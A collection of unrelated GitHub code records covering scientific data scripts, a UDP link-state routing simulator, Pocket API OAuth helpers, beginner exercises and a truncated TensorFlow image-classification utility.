read_cable_file(ele_fname)\n\n df_a = df_a[df_a.YEAR < 2017]\n df_e = df_e[df_e.YEAR < 2017]\n GPP_amb = df_a.groupby(\"YEAR\").GPP.sum()\n GPP_ele = df_e.groupby(\"YEAR\").GPP.sum()\n\n print(GPP_amb)\n print(GPP_ele)\n GPP_response = ((GPP_ele/GPP_amb)-1.0)*100.\n print(GPP_response)\n\ndef read_cable_file(fname):\n\n f = nc.Dataset(fname)\n time = nc.num2date(f.variables['time'][:],\n f.variables['time'].units)\n df = pd.DataFrame(f.variables['GPP'][:,0,0], columns=['GPP'])\n df['Qle'] = f.variables['Qle'][:,0,0]\n df['LAI'] = f.variables['LAI'][:,0,0]\n df['TVeg'] = f.variables['TVeg'][:,0,0]\n df['ESoil'] = f.variables['ESoil'][:,0,0]\n df['CO2air'] = f.variables['CO2air'][:,0]\n\n df['dates'] = time\n df = df.set_index('dates')\n df['YEAR'] = df.index.year\n\n UMOL_TO_MOL = 1E-6\n MOL_C_TO_GRAMS_C = 12.0\n\n # umol/m2/s -> g/C/30min\n df['GPP'] *= UMOL_TO_MOL * MOL_C_TO_GRAMS_C * 1800.0\n\n return df\n\n\nif __name__ == \"__main__\":\n\n amb_fname = \"outputs/EucFACE_amb_out.nc\"\n ele_fname = \"outputs/EucFACE_ele_out.nc\"\n main(amb_fname, ele_fname)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/calculate_GPP_response.py","file_name":"calculate_GPP_response.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8745487181","text":"with open('wor.txt', mode='wt') as file :\n count = 0\n for item in range(0,25):\n if count<25:\n str1 = input(\"enter the name\")\n file.write(str1+\"\\n\")\n count = count+1\n if str1==\"\":\n break\n \n else:\n print(\"limit reached\")\n break\nfp1 = open('wor.txt',mode='rt')\nfp1.seek(0,0)\nfp1.readlines()\n ","repo_name":"manaschhapiya/forks2019","sub_path":"day04/absentee.py","file_name":"absentee.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36754063082","text":"import os, sys\nimport json\nimport csv\n\npseudosequences = \"class1_pseudosequences.csv\"\nbdata_file = \"bdata.20130222.mhci.txt\"\n\n# Allele name to the AA pseudosequence\nname_to_sequence = {}\nwith open(pseudosequences) as f:\n\tread_csv = csv.reader(f, delimiter=',')\n\tfor row in read_csv:\n\t\tallele = row[0]\n\t\tsequence = row[1]\n\t\tname_to_sequence[allele] = sequence\n\nfile = open(bdata_file)\nbdata_lines = file.readlines()[1:]\n\nin_file = 0\nnot_in_file = 0\ngreater_than = 0\n\ncomprehensive_dataset = {}\nfor line in bdata_lines:\n\tparsed = line.split()\n\tallele = parsed[1]\n\tpeptide_seq = parsed[3]\n\tinequality = parsed[4]\n\tbinding_affinity = parsed[5]\n\n\tif inequality == '>':\n\t\tgreater_than += 1\n\t\tcontinue\n\n\txallele = allele.replace('*', '')\n\tif xallele in name_to_sequence:\n\t\tin_file += 1\n\t\taa_seq = name_to_sequence[xallele]\n\n\t\tif aa_seq not in comprehensive_dataset.keys():\n\t\t\tcomprehensive_dataset[aa_seq] = []\n\t\tcomprehensive_dataset[aa_seq].append((peptide_seq, binding_affinity))\n\telse:\n\t\tnot_in_file +=1\n\nprint(\"Num alleles found: \", in_file)\nprint(\"Num alleles not found: \", not_in_file)\nprint(\"Num alleles greater than: \", greater_than)\n\n# Generate the new dataset with most of these amino acid sequences\nwith open(\"mhcflurry_dataset.json\", 'w') as f:\n\tjson.dump(comprehensive_dataset, f)\n","repo_name":"hepengfe/aptamer-pursuit","sub_path":"archive/data/MHCFlurry_Data/parse_pseudosequences.py","file_name":"parse_pseudosequences.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18182464522","text":"# coding=utf-8\nimport threading\nimport socket\nimport pathlib\nimport time\nimport json\nimport argparse\nimport queue\n\nROUTE_UPDATE_INTERVAL = 30\nMAX_CONSECUTIVE_LOST_TIME = 3\nUPDATE_INTERVAL = 1\n\n\nclass NodesKnown(dict):\n # 自己的邻居是否更新\n neighbour_timestamp = int(time.time())\n # 其他节点是否更新\n nodes_timestamp = 0\n\n\ndef get_ts():\n return time.strftime('%H:%M:%S', time.localtime(time.time()))\n\n\ndef read_config(filename):\n file_path = pathlib.Path(filename)\n with open(file_path) as f:\n file_contains = f.readlines()\n nodes = dict()\n try:\n # neighbour_number = int(file_contains[0].strip())\n for line in file_contains[1:]:\n line_e = line.strip().split()\n if len(line_e) != 3:\n continue\n nodes[line_e[0]] = (float(line_e[1]), int(line_e[2]))\n except (ValueError,):\n print(\"config wrong\")\n exit()\n\n return nodes\n\n\n# target = (source_ID, source_port)\ndef sending(target, message):\n socket_instance.sendto(\n bytes(\n message,\n encoding='ascii'\n ),\n ('127.0.0.1', target[1])\n )\n\n\ndef listening_thread():\n i = 0\n while True:\n data, address = socket_instance.recvfrom(1024)\n data_list = json.loads(data.decode('ascii'))\n\n if data_list[1] == 1:\n if data_list[0] not in NEIGHBOURS.keys():\n print(f'[!!! ERROR !!!] Receive a broadcast not belong of neighbours')\n i += 1\n if i == 10:\n # print(f'[INFO] receive LST x 10')\n i = 0\n\n receive_queue.put((data_list, address[1]))\n pass\n\n\ndef dijkstra_thread():\n while True:\n time.sleep(ROUTE_UPDATE_INTERVAL)\n with nodes_known_lock:\n d = {ID: 0}\n previous = dict()\n S = set()\n Q = set(nodes_known.keys())\n while len(Q) != 0:\n u = sorted([(q, d[q]) for q in Q if d.get(q, -1) != -1], key=lambda x: x[1])[0][0]\n Q.remove(u)\n S.add(u)\n for i in nodes_known[u].items():\n if d.get(i[0], -1) == -1:\n d[i[0]] = d[u] + i[1]\n previous[i[0]] = u\n elif d[i[0]] > d[u] + i[1]:\n d[i[0]] = d[u] + i[1]\n previous[i[0]] = u\n\n print(f'I am Router {ID}')\n S.remove(ID)\n for i in sorted(S):\n u = i\n path = []\n while True:\n path.append(u)\n if u == ID:\n break\n u = previous[u]\n path_string = ''.join([i for i in reversed(path)])\n print(f'Least cost path to router {i}:{path_string} and the cost: {round(d[i],1)}')\n sor = sorted(nodes_known.items(), key=lambda x:x[0])\n # print(f'[Dijkstra] {sor}')\n\n\ndef broadcast_thread():\n # default_message_for_broadcast = [\n # 'C',\n # 1|2|3,\n # 123456754,\n # {\n # 'A' : 4.5,\n # 'B' : 5,\n # ...\n # }\n # ]\n\n # 开机广播一次update\n update_broadcast = default_message_for_broadcast.copy()\n update_broadcast[1] = 5\n for i in NEIGHBOURS.items():\n # print(f'[SEND] sending update packet {update_broadcast}')\n send_queue.put(\n (\n update_broadcast,\n (i[0], i[1][1])\n )\n )\n\n while True:\n try:\n nodes_known_lock.acquire(True, 0.5)\n # print(f'{nodes_known.neighbour_timestamp}')\n neighbour = nodes_known[ID]\n list_for_broadcast = [ID, 1, nodes_known.neighbour_timestamp, neighbour.copy()]\n # neighbour = {\n # 'B' : 6.5,\n # 'F' : 2.2,\n # ...\n # }\n for nbh in neighbour.items():\n # NEIGHBOURS = {\n # 'B' : (6.5, 5001),\n # 'F' : (2.2, 5005),\n # ...\n # }\n\n # send = (\n # [source_id, type, timestamp, data],\n # (source_id, source_port)\n # )\n send = (list_for_broadcast, (nbh[0], NEIGHBOURS[nbh[0]][1]))\n send_queue.put(send)\n # print(f'[Broadcast] to {neighbour}')\n finally:\n nodes_known_lock.release()\n\n time.sleep(1)\n\n\ndef sending_thread():\n broadcast_thread_instance = threading.Thread(target=broadcast_thread)\n broadcast_thread_instance.start()\n i = 0\n while True:\n\n # while broadcast_queue.empty() is False:\n # send_queue.put(broadcast_queue.get())\n #\n # Deadlock if without get_nowait()\n # This part of code with get_nowait() would also raise\n # the CPU load because there is no blocking\n #\n # try:\n # send = send_queue.get_nowait()\n # except queue.Empty:\n # continue\n\n\n # send = (\n # [source_id, type, timestamp, data],\n # (source_id, source_port)\n # )\n\n send = send_queue.get()\n data_list, target = send\n\n packet_type = data_list[1]\n data = json.dumps(data_list, separators=(',', ':'))\n if packet_type == 2:\n # 创建一个计时器\n check_ack_thread = threading.Thread(target=check_ack, args=send)\n sending(target, message=data)\n # print(f'[Forward] To {target[0]}:{target[1]} {data}')\n # 触发计时器,发送完数据5s后运行check()\n check_ack_thread.start()\n else:\n if packet_type == 1:\n # print(f'[Broadcast] {node_data[target]}:{target} {data}')\n i += 1\n if i == 10:\n # print(f'[Broadcast] {data} x 10')\n i = 0\n sending(target, message=data)\n\n\n# send = (\n# [source_id, type, timestamp, data],\n# (source_id, source_port)\n# )\ndef check_ack(*send):\n time.sleep(3)\n\n packet_data_list = send[0]\n target = send[1]\n\n packet_source_router_name, packet_type, packet_timestamp = \\\n packet_data_list[0], packet_data_list[1], packet_data_list[2]\n target_router_name, target_router_port = target\n\n try:\n nodes_ack_lock.acquire()\n # print(f'nodes_ack[{target_router_name}] is {success} in check_ack after used')\n if nodes_ack.get(target_router_name, False):\n # print(f'ACK DATABASE {nodes_ack} in check_ack')\n return\n finally:\n nodes_ack[target_router_name] = False\n nodes_ack_lock.release()\n\n # 如果等待的节点已经掉线了,就不再重传forward包,不在等待ACK\n try:\n nodes_known_lock.acquire()\n if target_router_name not in nodes_known[ID]:\n # print(f'[Fail] To {target_router_name}:{target_router_port} has been removed from neighbour')\n return\n finally:\n nodes_known_lock.release()\n\n # print(f'[Fail] To {target_router_name}:{target_router_port} {send[0]}, try again')\n send_queue.put(send)\n\n\ndef check_alive():\n # nodes_heartbeat = {\n # 'A' : 1,\n # 'B' : 2,\n # .....\n # }\n\n # nodes_known = {\n # 'B' : {\n # 'F' : 2.2,\n # },\n # 'F' : {\n # 'B' : 2.2,\n # 'A' : 4,\n # ...\n # },\n # ...\n # }\n\n while True:\n lost_node = []\n with nodes_known_lock:\n with nodes_heartbeat_lock:\n for n in nodes_known[ID].keys():\n if nodes_heartbeat.setdefault(n, 0) >= MAX_CONSECUTIVE_LOST_TIME:\n lost_node.append(n)\n else:\n nodes_heartbeat[n] += 1\n\n if len(lost_node) != 0:\n # print(f'[LOST] {lost_node} {time.time()}')\n # print(f'{nodes_known}')\n for n in lost_node:\n # print(f'[DELETE] nodes_known[{ID}][{n}]: {nodes_known[ID][n]}')\n # print(f'{nodes_known[ID].pop(n)}')\n del nodes_known[ID][n]\n # print(f'[DELETE] nodes_known[{ID}][{n}]OK')\n if n in nodes_known.keys():\n del nodes_known[n]\n # print(f'[DELETE] nodes_known[{n}]OK')\n with packet_update_time_lock:\n offline_packet_list = [n, 1, packet_update_time.get(n, 0)+1, {}]\n receive_queue.put((offline_packet_list, NEIGHBOURS[n][1]))\n # print(f'[Receive] offline packet from {n}: {offline_packet_list}')\n nodes_known.nodes_timestamp = nodes_known.neighbour_timestamp = int(time.time())\n\n time.sleep(UPDATE_INTERVAL)\n\n\n# For avoiding deadlock, order Locks:\n# 1 nodes_ack_lock\n# 2 nodes_known_lock\n# 3 packet_update_time_lock\n# 4 nodes_heartbeat_lock\ndef main_thread():\n while True:\n receive = receive_queue.get()\n receive_data_list, packet_receive_from_port = receive[0], receive[1]\n packet_source_router, packet_type, packet_timestamp = \\\n receive_data_list[0], receive_data_list[1], receive_data_list[2]\n\n # 心跳包\n if packet_type == 1:\n with nodes_heartbeat_lock:\n nodes_heartbeat[packet_source_router] = 0\n # print(f'[RETENTION] nodes_heartbeat[{packet_source_router}] == 0')\n\n if packet_type not in {1, 2, 3, 4, 5}:\n # print(f'I don\\'t know what\\'s the meaning of packet!!!!')\n continue\n\n if packet_type == 3:\n # print(f'[ACK] From {node_data[packet_receive_from_port]}: {packet_receive_from_port}')\n with nodes_ack_lock:\n nodes_ack[packet_source_router] = True\n # print(f'SET nodes_ack[{packet_source_router}] to True')\n # print(f'ACK DATABASE {nodes_ack}')\n continue\n\n # 主机再次上线\n if packet_type == 5:\n node_cost = receive_data_list[3]\n # 重设转发的时间戳,告诉周围主机,转发的时候带我一个\n with nodes_known_lock, packet_update_time_lock:\n for p in packet_update_time.keys():\n if len(p) == 2 and p[1] == packet_source_router:\n packet_update_time[p] = 0\n try:\n nodes_known[ID][packet_source_router] = node_cost[ID]\n nodes_known.neighbour_timestamp = int(time.time())\n except KeyError:\n print(f'数据包中没有从源地址到本机的cost')\n continue\n\n # 如果是转发报文 reply ACK\n if packet_type == 2:\n # print(f'[RECEIVE] Forwarded packet from {node_data[packet_receive_from_port]}:{packet_receive_from_port} '\n # f'{receive_data_list} {time.time()}')\n\n # ????\n # send_queue.put(([ID, 3, receive_data_list[2]], packet_receive_from_port))\n # print(f'[SEND] ACK to {node_data[packet_receive_from_port]}:{packet_receive_from_port} ')\n send_queue.put(([ID, 3, packet_timestamp], (receive_data_list[0], packet_receive_from_port)))\n\n # print(f'[RECEIVE] Broadcast packet from {node_data[packet_receive_from_port]}:{packet_receive_from_port} '\n # f'{receive_data_list}')\n with nodes_known_lock, packet_update_time_lock:\n node_cost = receive_data_list[3]\n last_update_time = packet_update_time.get(packet_source_router, 0)\n # print(f'[RECEIVE] from {packet_source_router}:{receive_data_list}, old: {last_update_time}')\n # print(f'recorded timestamp {packet_source_router} to self: {last_update_time}')\n # print(f'packet timestamp {packet_source_router} to self: {packet_timestamp}')\n\n # 接收到的数据包的时间戳比本机记录的时间戳晚,说明:\n # 1.源主机再次上线\n # 2.源主机由内容更新\n\n if last_update_time < packet_timestamp:\n packet_update_time[packet_source_router] = packet_timestamp\n # print(f'[INFO] {nodes_known.nodes_timestamp}: {nodes_known}')\n # 更新\n # node_cost = {\n # 'A': 6.3,\n # 'C': 7.4,\n # ...\n # }\n # 更新 从 源主机 到 本机 的内容\n # print(f'node_cost: {node_cost}')\n if len(node_cost) != 0:\n nodes_known[packet_source_router] = node_cost\n\n # A 收到 B 的数据包: {'C': 5, 'E':8} 说明 B与CD想通, C、D与B想通\n # C、D与B想通这个信息迟早要通过包转发发送过来\n # for i in node_cost.items():\n # nodes_known.setdefault(i[0], dict())[packet_source_router] = i[1]\n\n nodes_known.nodes_timestamp = int(time.time())\n # print(f'[UPDATE] Know {nodes_known}')\n elif packet_source_router in nodes_known.keys():\n del nodes_known[packet_source_router]\n # print(f'[DELETE] nodes_known[{packet_source_router}]OK')\n nodes_known.nodes_timestamp = int(time.time())\n\n for n in nodes_known[ID].items():\n target_router_name = n[0]\n # 不转发给信件原作者\n if target_router_name == packet_source_router:\n continue\n\n target_router_port = NEIGHBOURS[target_router_name][1]\n\n # 不转发给来信放\n if target_router_port == packet_receive_from_port:\n continue\n\n # 如果接收的时间戳是旧的或者是相等的,和每一个都比较一下\n if last_update_time >= packet_timestamp:\n # print(f'last_update_time >= packet_timestamp')\n last_update_time_s_to_t = packet_update_time.get((packet_source_router, target_router_name), 0)\n # print(f'recorded timestamp {packet_source_router} to {target_router}: {last_update_time_s_to_t}')\n if last_update_time_s_to_t >= packet_timestamp:\n # print(f'ast_update_time_s_to_t >= packet_timestamp')\n continue\n\n receive_data_list[1] = 2\n\n packet_update_time[(packet_source_router, target_router_name)] = packet_timestamp\n # print(f'[UPDATE] Forward packet from {packet_source_router} to {target_router_name}, '\n # f'old: {last_update_time}, new: {packet_timestamp}')\n\n # print(f'[Forward] To {target_router_name}:{target_router_port} {receive_data_list}')\n send_queue.put((receive_data_list, (target_router_name, target_router_port)))\n\n\n # print(get_ts() + ': '\n # f'receive data from {receive_data_list[0][0]}, type {receive_data_list[0][1]}, '\n # f'timestamp {receive_data_list[0][2]}: {receive_data_list[0][3]}')\n\n\nap = argparse.ArgumentParser(description='Assignment of COMP9331\\n author: Shichao ZHANG (z5178127)')\nap.add_argument('id', metavar='ID')\nap.add_argument('port', metavar='PORT')\nap.add_argument('config', metavar='CONFIG')\nargs = ap.parse_args()\n\n\nPORT = args.port\ntry:\n PORT = int(PORT)\n if PORT < 0 or PORT > 65535:\n raise ValueError\nexcept (ValueError, TypeError):\n print('PORT is incorrect')\n\nID = args.id\nCONFIG = args.config\n\nsocket_instance = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\nsocket_instance.bind(('0.0.0.0', PORT))\n\n# NEIGHBOURS = {\n# 'B' : (6.5, 5001),\n# 'F' : (2.2, 5005),\n# ...\n# }\n\n# nodes_known = {\n# 'B' : {\n# 'F' : 2.2,\n# },\n# 'F' : {\n# 'B' : 2.2,\n# 'A' : 4,\n# ...\n# },\n# ...\n# }\n\nNEIGHBOURS = read_config(CONFIG)\n\nnodes_known = NodesKnown()\nnodes_known_lock = threading.Lock()\n\nnodes_known[ID] = dict()\nfor n in NEIGHBOURS.items():\n # n[0]: node_ID\n # n[1][0]: cost\n nodes_known[ID][n[0]] = n[1][0]\n nodes_known[n[0]] = {ID: n[1][0]}\n\nnodes_known.neighbour_timestamp = int(time.time())\ndefault_message_for_broadcast = [ID, 1, nodes_known.neighbour_timestamp, nodes_known[ID].copy()]\n\n# +-------------------------------------------+\n# | SOURCE ID | TYPE | TIMESTAMP | STATE DATA |\n# +-------------------------------------------+\n# TYPE:\n# 1: 自身广播包,无序被确认\n# 2: 转发别人的广播包,需要被确认,因为只广播一次\n# 3: 确认包\n# 5: 再次上线广播包\n\n# message_for_broadcast = json.dumps([ID, 1, int(time.time()), NEIGHBOURS])\n# message_for_broadcast = json.dumps([ID, 1, int(time.time()), nodes_known[ID]])\n\npacket_update_time = dict()\npacket_update_time_lock = threading.Lock()\n\nnodes_ack = dict()\nnodes_ack_lock = threading.Lock()\n\nnodes_heartbeat = dict()\nnodes_heartbeat_lock = threading.Lock()\n\nreceive_queue = queue.Queue()\nsend_queue = queue.Queue()\nbroadcast_queue = queue.Queue()\n\n# print(f'[INFO] ROuter: {ID}')\n# print(f'[INFO] Config: {NEIGHBOURS}')\n# print(f'[INFO] {nodes_known.neighbour_timestamp}: {nodes_known}')\n\n\nt1 = threading.Thread(target=sending_thread)\nt2 = threading.Thread(target=listening_thread)\nt3 = threading.Thread(target=main_thread)\nt4 = threading.Thread(target=check_alive)\nt5 = threading.Thread(target=dijkstra_thread)\n\nt1.start()\nt2.start()\nt3.start()\nt4.start()\nt5.start()\n","repo_name":"firedent/OSPF_simulation","sub_path":"Lsr.py","file_name":"Lsr.py","file_ext":"py","file_size_in_byte":17705,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"37103962135","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Pocket specific utils \"\"\"\n\nimport logging\nimport requests\n\nimport poku.exceptions\n\n\ndef get_request_token(consumer_key):\n \"\"\" get request token from api \"\"\"\n data = {'consumer_key': consumer_key, 'redirect_uri': 'getpocket.com'}\n headers = {'x-accept': 'application/json'}\n r = requests.post('https://getpocket.com/v3/oauth/request',\n data=data, headers=headers)\n\n if r.ok:\n request_token = r.json()['code']\n logging.info(f'Request token retrived successfully: {request_token}')\n return request_token\n else:\n exception_msg = 'An error occured while requesting request token'\n raise poku.exceptions.PocketGetRequestTokenException(exception_msg)\n\n\ndef generate_auth_url(request_token):\n \"\"\" return auth url for user to authorize application \"\"\"\n url = ('https://getpocket.com/auth/authorize'\n f'?request_token={request_token}'\n '&redirect_uri=https://getpocket.com')\n\n return url\n\n\ndef get_access_token(consumer_key, request_token):\n \"\"\" get access token from api \"\"\"\n data = {'consumer_key': consumer_key, 'code': request_token}\n headers = {'x-accept': 'application/json'}\n r = requests.post('https://getpocket.com/v3/oauth/authorize',\n data=data, headers=headers)\n\n if r.ok:\n access_token = r.json()['access_token']\n logging.info(f'Access token retrieved successfully: {access_token}')\n return access_token\n else:\n exception_msg = 'An error occured while requesting access token'\n raise poku.exceptions.PocketGetAccessTokenException(exception_msg)\n\n\ndef get_items(consumer_key, access_token):\n \"\"\" get a list pocket items from api \"\"\"\n data = {\n 'consumer_key': consumer_key,\n 'access_token': access_token,\n 'detailType': 'complete'\n }\n r = requests.post('https://getpocket.com/v3/get', data=data)\n\n if r.ok:\n pocket_items = [i for i in r.json()['list'].values()]\n logging.info(f'{len(pocket_items)} pocket items retrieved')\n return pocket_items\n else:\n exception_msg = 'An error occured while retrieving pocket items'\n raise poku.exceptions.PocketGetItemsException(exception_msg)\n\n\ndef item_to_dict(p_item):\n \"\"\" convert pocket item to universal dict \"\"\"\n out = {\n 'url': p_item.get('resolved_url') or p_item.get('given_url'),\n 'title': p_item.get('resolved_title') or p_item.get('given_title'),\n 'tags': sorted(p_item.get('tags', {}).keys()),\n 'timestamp': int(p_item.get('time_added'))\n }\n\n return out\n","repo_name":"surskitt/poku","sub_path":"poku/pocket.py","file_name":"pocket.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"53"} +{"seq_id":"38508962634","text":"#2diseñe un app con una funcion que calcule el area del triangulo y luego sea llamada por un algoritmo\n\n#FUNCION AREA DE UN TRIANGULO\ndef triangulo():\n area=(b*h)/2\n print(\"El area del triangulo es: \",area)\n\n\n#algoritmo para llamar a la funcion\n#app area del rectangulo\n\nb=float(input(\"Ingrese la base del triangulo: \"))\nh=float(input(\"Ingrese la altura del triangulo: \"))\n\ntriangulo()","repo_name":"MartinezT-Omar/MartinezT-Omar.github.io","sub_path":"PYTHON/Funciones/proyecto6.py","file_name":"proyecto6.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16109964784","text":"import os\nimport random\nimport imageio\nimport glob\nimport datetime\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom IPython.display import display_markdown\n\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications import ResNet50, EfficientNetB0\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Rescaling, CenterCrop\nfrom tensorflow.keras.utils import Sequence, to_categorical, plot_model\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom sklearn.utils import class_weight\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nfrom tqdm.keras import TqdmCallback\nimport tensorflow_addons as tfa\n\nfrom keras import layers\nfrom keras import models\nfrom keras.models import Model\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, precision_score, recall_score, accuracy_score\n\nimport io\nimport cv2\ndef resize_img_aspect(image, new_height=512):\n height, width, _ = image.shape\n ratio = width / height\n\n new_width = int(ratio * new_height)\n\n image = cv2.resize(image, (new_width, new_height))\n return image\n \ndef fig_to_img(fig):\n buf = io.BytesIO()\n plt.savefig(buf, format='png', bbox_inches='tight')\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=3).numpy() \n return image\n\n# Function to get paths from private directory\ndef get_files(base_dir, resolution=None, exclude_pd=False):\n resolution = resolution if resolution != 'public' else None\n ext = ['jpg', 'jpeg']\n ret_files = []\n\n for f in glob.glob(f'{base_dir}/**', recursive=True):\n if not any([f.endswith(e) for e in ext]):\n continue\n if (resolution is not None) and (f'_{resolution}' not in f):\n continue\n if (exclude_pd) and ('_pd' in f):\n continue\n ret_files.append(f)\n \n return ret_files\n\ndef get_classes_labels(root_directory, image_paths, class_type, exclude_pd=False):\n if class_type == 'micro':\n class_names = sorted([f for f in os.listdir(root_directory) if not f.startswith('.')])\n else:\n class_names = sorted(list(set([f if '_' not in f else f.split('_')[0] for f in os.listdir(root_directory) if not f.startswith('.')])))\n \n class_names = class_names if not exclude_pd else [c for c in class_names if '_pd' not in c]\n\n class2int = dict(zip(class_names, range(len(class_names))))\n labels = list(map(lambda im: class2int[im.split(root_directory)[1].split('/')[0]] if class_type=='micro' else class2int[im.split(root_directory)[1].split('/')[0].split('_')[0]], image_paths))\n \n return class_names, class2int, labels\n \n\nclass CustomDataGenerator(Sequence):\n def __init__(self, images, labels, num_classes, batch_size=8, image_size=255, \n shuffle_epoch=True, mode='train'):\n \n assert mode in ['train', 'val']\n assert batch_size%4 == 0\n \n self.num_classes = num_classes\n self.images = images\n self.labels = labels\n self.batch_size = batch_size\n self.image_size = image_size\n self.shuffle_epoch = shuffle_epoch\n self.mode = mode \n \n def __len__(self):\n if self.mode == 'train':\n return int(np.ceil(len(self.images) / self.batch_size))\n return int(np.ceil(len(self.images)*4 / self.batch_size))\n \n def __getitem__(self, idx):\n \n if (idx == 0) and (self.shuffle_epoch): \n # Shuffle at first batch\n c = list(zip(self.images, self.labels))\n random.shuffle(c)\n self.images, self.labels = zip(*c)\n self.images, self.labels = np.array(self.images), np.array(self.labels) \n \n bs = self.batch_size if self.mode == 'train' else self.batch_size//4\n images = self.images[idx * bs : (idx+1) * bs]\n labels = self.labels[idx * bs : (idx+1) * bs]\n \n # Read images\n images = np.array([imageio.v2.imread(im) for im in images])\n images = images/255\n \n if self.mode == 'train':\n # Choose one of the four quadrants\n x, y = np.random.choice([0,1], size=2)\n images = images[:,(x*600):(x*600 + 600), (y*800):(y*800 + 800)]\n\n images = np.array([self.random_crop(im) for im in images])\n labels = to_categorical(labels, num_classes=self.num_classes)\n\n return images, labels\n \n new_images, new_labels = [], []\n for x in range(2):\n for y in range(2):\n new_images.append(images[:,(x*600):(x*600 + 600), (y*800):(y*800 + 800)])\n new_labels.append(to_categorical(labels, num_classes=self.num_classes))\n\n #indexes = [i for j in range(4) for i in range(j, len(images) * 4, 4)]\n indexes = list(range(0,len(images)*4,2)) + list(range(1,len(images)*4,2))\n #print(indexes)\n new_images = np.concatenate(new_images)[indexes]\n new_labels = np.concatenate(new_labels)[indexes]\n \n # from ZGlobalLib.visualization import plot_frames\n # plot_frames(images)\n \n new_images = tf.image.resize(new_images, (300, 400)).numpy()\n new_images = CenterCrop(self.image_size, self.image_size)(new_images).numpy()\n \n return new_images, new_labels\n \n \n def random_crop(self, image):\n image = tf.image.resize(image, (300, 400)).numpy()\n cropped_image = tf.image.random_crop(image, size=[self.image_size, self.image_size, 3]).numpy()\n return cropped_image\n \n \n def show_generator(self, N=12): \n g0 = self[0]\n N = min(N, len(g0[0]))\n fig, axs = plt.subplots(1,N, figsize=(20,4))\n for i in range(N):\n axs[i].imshow(g0[0][i])\n axs[i].axis('off')\n axs[i].set_title(g0[1][i])\n \n\nclass PublicDataGenerator(Sequence):\n def __init__(self, images, labels, num_classes, batch_size=8, image_size=255, \n shuffle_epoch=True, mode='train'):\n \n self.num_classes = num_classes\n self.images = images\n self.labels = labels\n self.batch_size = batch_size*4\n self.image_size = image_size\n self.shuffle_epoch = shuffle_epoch\n \n def __len__(self):\n return int(np.ceil(len(self.images) / self.batch_size))\n \n def __getitem__(self, idx):\n \n if (idx == 0) and (self.shuffle_epoch): \n # Shuffle at first batch\n c = list(zip(self.images, self.labels))\n random.shuffle(c)\n self.images, self.labels = zip(*c)\n self.images, self.labels = np.array(self.images), np.array(self.labels) \n \n bs = self.batch_size\n images = self.images[idx * bs : (idx+1) * bs]\n labels = self.labels[idx * bs : (idx+1) * bs]\n \n # Read images\n images = np.array([imageio.v2.imread(im) for im in images])\n images = images/255\n \n images = np.array([self.random_crop(im) for im in images])\n labels = to_categorical(labels, num_classes=self.num_classes)\n\n return images, labels\n \n \n def random_crop(self, image):\n # cropped_image = tf.image.random_crop(image, size=[self.image_size, self.image_size, 3]).numpy()\n cropped_image = tf.image.resize(image, (256, 256)).numpy()\n return cropped_image\n \n \n def show_generator(self, N=12): \n g0 = self[0]\n N = min(N, len(g0[0]))\n fig, axs = plt.subplots(1,N, figsize=(20,4))\n for i in range(N):\n axs[i].imshow(g0[0][i])\n axs[i].axis('off')\n axs[i].set_title(g0[1][i])\n \n \ndef get_generators(image_paths, labels, num_classes, resolution, test_size=0.15, batch_size=8, random_state=42):\n #Split in training and validation\n train_paths, val_paths, train_labels, val_labels = train_test_split(image_paths, labels, test_size=test_size, random_state=42)\n \n #Build the generators\n if resolution == 'public':\n train_generator = PublicDataGenerator(train_paths, train_labels, num_classes=num_classes, batch_size=batch_size)\n val_generator = PublicDataGenerator(val_paths, val_labels, num_classes=num_classes, shuffle_epoch=False, batch_size=batch_size)\n else: \n train_generator = CustomDataGenerator(train_paths, train_labels, num_classes=num_classes, batch_size=batch_size)\n val_generator = CustomDataGenerator(val_paths, val_labels, num_classes=num_classes, shuffle_epoch=False, mode='val', batch_size=batch_size)\n \n return train_generator, val_generator\n\n\ndef compute_weights(train_generator):\n labels = np.concatenate([l.argmax(1) for _, l in tqdm(train_generator, leave=False)])\n class_weights = class_weight.compute_class_weight('balanced',\n classes=np.unique(labels),\n y=list(labels))\n class_weights = dict(enumerate(class_weights))\n return class_weights\n\n\n\ndef simple_model(num_classes, resolution):\n entradas = layers.Input((255, 255, 3))\n\n # Two convolutional layers with 16 filters each\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(entradas)\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(x)\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(x)\n\n x = layers.GlobalAveragePooling2D()(x)\n\n # Dense layer with 1280 units\n x = layers.Dense(32, activation='relu')(x)\n\n # Output layer\n output_tensor = layers.Dense(num_classes, activation='softmax')(x)\n\n model = Model(inputs=entradas, outputs=output_tensor)\n return model\n\n \ndef get_model(num_classes, resolution):\n \n #return simple_model(num_classes, resolution)\n \n base_model = EfficientNetB0(include_top = False, weights='imagenet', pooling='avg')\n # base_model = EfficientNetB0(include_top = False, weights=None, pooling='avg')\n\n # Introduce a layer of data 